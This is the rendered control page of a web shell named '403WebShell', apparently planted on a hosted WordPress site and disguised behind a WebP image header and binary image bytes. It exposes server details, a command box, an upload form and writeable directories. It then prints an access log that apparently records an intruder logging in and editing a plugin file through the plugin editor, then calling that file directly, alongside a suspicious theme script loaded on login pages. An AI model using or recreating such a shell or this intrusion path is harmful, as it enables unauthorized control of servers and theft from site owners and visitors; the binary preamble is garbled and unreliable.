....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îЇy’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒw޼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9ué¶³ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•╪Vêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄͰL–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýcå¡¶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ЁBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊÆƒZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 104.19.154.92  /  Your IP : 216.73.216.47
Web Server : Apache
System : Linux lon12.onrocket.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC 2023 x86_64
User : gd5hzp4 ( 1069)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gd5hzp4/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gd5hzp4/access-logs/caketoppers.gd5hxejij3.onrocket.site-ssl_log
54.38.145.185 - - [25/Feb/2026:12:13:41 +0000] "POST /wp-cron.php?doing_wp_cron=1772021621.4279100894927978515625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
77.75.77.72 - - [25/Feb/2026:12:13:39 +0000] "GET /robots.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)"
77.75.79.72 - - [25/Feb/2026:12:13:41 +0000] "GET /robots.txt HTTP/1.1" 200 76 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)"
54.38.145.185 - - [25/Feb/2026:12:16:34 +0000] "POST /wp-cron.php?doing_wp_cron=1772021794.2035179138183593750000 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:16:31 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.164.185 - - [25/Feb/2026:12:16:53 +0000] "GET /wp-login.php HTTP/1.1" 200 11024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.164.185 - - [25/Feb/2026:12:16:56 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772021815 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.164.185 - - [25/Feb/2026:12:16:56 +0000] "GET /wp-login.php HTTP/1.1" 200 11024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:16:56 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772021816 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:17:22 +0000] "POST /wp-cron.php?doing_wp_cron=1772021842.3326590061187744140625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:17:18 +0000] "POST /wp-login.php HTTP/1.1" 302 - "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:22 +0000] "GET /wp-admin/ HTTP/1.1" 200 351217 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:26 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 581074 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:26 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772021843 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:26 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:27 +0000] "GET /wp-json/wp/v2/ HTTP/1.1" 200 225150 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:27 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 44 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:28 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 102 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:32 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:42 +0000] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 380019 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:43 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,code-editor,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 577159 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:43 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772021862 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:43 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:17:48 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:18:00 +0000] "POST /wp-cron.php?doing_wp_cron=1772021880.1457550525665283203125 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:17:59 +0000] "GET /wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select HTTP/1.1" 200 299546 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:18:01 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,code-editor,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 577159 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:18:01 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772021880 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:18:01 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:18:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:18:33 +0000] "POST /wp-cron.php?doing_wp_cron=1772021913.2560439109802246093750 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:18:31 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:18:49 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:19:10 +0000] "POST /wp-cron.php?doing_wp_cron=1772021949.9917631149291992187500 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:19:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:19:52 +0000] "POST /wp-cron.php?doing_wp_cron=1772021992.4128038883209228515625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:19:50 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:19:53 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:20:34 +0000] "POST /wp-cron.php?doing_wp_cron=1772022034.4201679229736328125000 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:20:32 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:20:52 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:21:02 +0000] "GET /wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:21:08 +0000] "POST /wp-cron.php?doing_wp_cron=1772022068.1936330795288085937500 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
